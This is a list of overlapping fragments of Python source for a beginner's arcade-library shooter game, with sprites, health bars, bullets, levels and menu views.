"self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed",
"= 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health)",
"= 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50,",
"to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level +",
"self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH)",
"for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how",
"= random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if",
"is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y =",
"if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead",
"-10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale,",
"= MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and",
"\"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the",
"Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame()",
"math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x # and",
"Move the player \"\"\" # Move player around the screen self.center_x += self.change_x",
"SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT)",
"+= 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy,",
"Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x",
"1 else: self.good = False else: for i in range(self.amount_of_enemies): # Create the",
"enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2)",
"x_diff) # Taking into account the angle, calculate our change_x # and change_y.",
"# Rotate the coin. # The arcade.Sprite class has an \"angle\" attribute that",
"start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y,",
"SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure he cant",
"player in player_hit: # Make sure this is the right sprite if not",
"arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw",
"+= min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x",
"must be all ints\") # Remove one health point enemy.enemy_cur_health -= 1 #",
"import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3",
"None self.bullet_list = None # Set up the player self.player_sprite = None self.enemy_health",
"< 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top =",
"+ 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level",
"<= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else:",
"all ints\") # Remove one health point enemy.enemy_cur_health -= 1 # Check health",
"bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y +",
"Background image will be stored in this variable self.background = None def levels(self):",
"HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health):",
"bullet to the destination. x_diff = dest_x - start_x y_diff = dest_y -",
"#self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit =",
"see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it",
"SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape,",
"self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED #",
"0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output",
"for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY,",
"the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2)",
"out-of-bounds if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH -",
"enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3",
"start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y",
"not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED",
"start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4,",
"output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list:",
"arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite)",
"\"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE,",
"in hit_list: # Make sure this is the right sprite if not isinstance(enemy,",
"self.window.level > 3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create",
"Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu",
"screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all",
"key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe",
"in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main",
"random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list ==",
"self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers):",
"travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add",
"if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed =",
"<= 3: for i in range(self.amount_of_enemies): # Create the enemy image enemy =",
"key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False",
"enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the",
"x, y, button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound)",
"= ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy",
"main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class",
"key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the",
"lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else:",
"window.level = 0 # game = MyGame() # game.setup() # arcade.run() if __name__",
"45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list:",
"SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on",
"-10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def",
"# Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add",
"delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0",
"0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT",
"range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 =",
"start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y #",
"arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health",
"our change_x # and change_y. Velocity is how fast the bullet travels. bullet.change_x",
"if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1:",
"120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y +",
"self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED,",
"arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if",
"This tells the enemies to go to the main guy if self.center_y <",
"= False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be",
"Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x +",
"arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self):",
"= MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\"",
"arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y,",
"the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view)",
"# Check this bullet to see if it hit a enemy hit_list =",
"== arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif",
"enemy in hit_list: # Make sure this is the right sprite if not",
"= 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED =",
"208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard to move",
"= 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x",
"it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get",
"def player_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\"",
"start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard to move around\",",
"# Set up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 =",
"HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, #",
"> self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health",
"in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update()",
"300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self,",
"self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good",
"bullet at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x",
"he cant go off the screen if self.bottom < 0: self.bottom = 0",
"def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2,",
"10, color=arcade.color.RED) # Calculate width based on health start_x = 85 start_y =",
"self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left <",
"Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If",
"controls # the sprite rotation. Change this, and the sprite rotates. self.angle +=",
"BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to the lists",
"else: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\",",
"def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press to advance",
"= GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound)",
"15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE,",
"# Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output,",
"== arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def",
"100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\",",
"class GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\" def on_show(self):",
"self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x =",
"HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar #",
"height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health",
"= random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list",
"= SCREEN_WIDTH # Background image will be stored in this variable self.background =",
"Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom",
"Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet",
"SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT",
"hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid",
"self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy",
"and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy image",
"location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y",
"get the bullet to the destination. x_diff = dest_x - start_x y_diff =",
"key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True",
"start_y # Get from the mouse the destination location for the bullet dest_x",
"False def setup(self): # Set up the game # Sprite lists self.window.level =",
"arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270",
"bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED #",
"'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK)",
"Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list =",
"= 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard to",
"# The arcade.Sprite class has an \"angle\" attribute that controls # the sprite",
"* (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN)",
"self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else:",
"enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called",
"ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120,",
"# Move player around the screen self.center_x += self.change_x self.center_y += self.change_y #",
"# the sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle",
"arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number()",
"self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list:",
"coin. # The arcade.Sprite class has an \"angle\" attribute that controls # the",
"= 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y =",
"= f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self):",
"True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key. \"\"\"",
"render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) #",
"self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if",
"+ HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar",
"SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\")",
"at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x =",
"def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT,",
"= SCREEN_WIDTH - 1 # Make sure he cant go off the screen",
"self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3",
"if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1:",
"= arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400",
"to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240",
"# Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y,",
"switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render()",
"if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1 self.good =",
"min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y -",
"self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1",
"5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10",
"scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health",
"a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif",
"color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move player around the",
"on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press to advance to",
"self.right = SCREEN_WIDTH - 1 # Make sure he cant go off the",
"SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20",
"= .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET =",
"self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED,",
"'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class",
"the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y)",
"Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208",
"> 3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the",
"= 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10)",
"def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH,",
"for player in player_hit: # Make sure this is the right sprite if",
"image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 =",
"Position the bullet at the player's current location start_x = self.player_sprite.center_x start_y =",
"310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15)",
"self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good = False def",
"if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed =",
"self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health",
"GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\" def on_show(self): \"\"\"",
"destination location for the bullet dest_x = x dest_y = y # Do",
"ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self,",
"on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key ==",
"how to get the bullet to the destination. x_diff = dest_x - start_x",
"-1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\")",
"the bullet dest_x = x dest_y = y # Do math to calculate",
"= 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED,",
"* (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\"",
"self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be stored in",
"player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers):",
"self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite",
"\"angle\" attribute that controls # the sprite rotation. Change this, and the sprite",
"Make sure this is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List",
"self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False",
"Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and",
"= MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game",
"== 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif",
"how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,",
"self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y =",
"\"\"\" if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed",
"user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif",
"this is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must",
"background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) #",
"player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self,",
"1 else: self.good = False def setup(self): # Set up the game #",
"center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the",
"the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level",
"isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") # Remove one health",
"self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from",
"the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all",
"releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif key",
"lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else:",
"Move player around the screen self.center_x += self.change_x self.center_y += self.change_y # Check",
"# Make sure this is the right sprite if not isinstance(enemy, ENEMY): raise",
"# Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement",
"self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health",
"# If it did, get rid of the bullet if len(hit_list) > 0:",
"bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in hit_list: #",
"arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270",
"# Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound",
"= None # Set up the player self.player_sprite = None self.enemy_health = 2",
"# Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def",
"330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123,",
"+ HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw",
"arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self,",
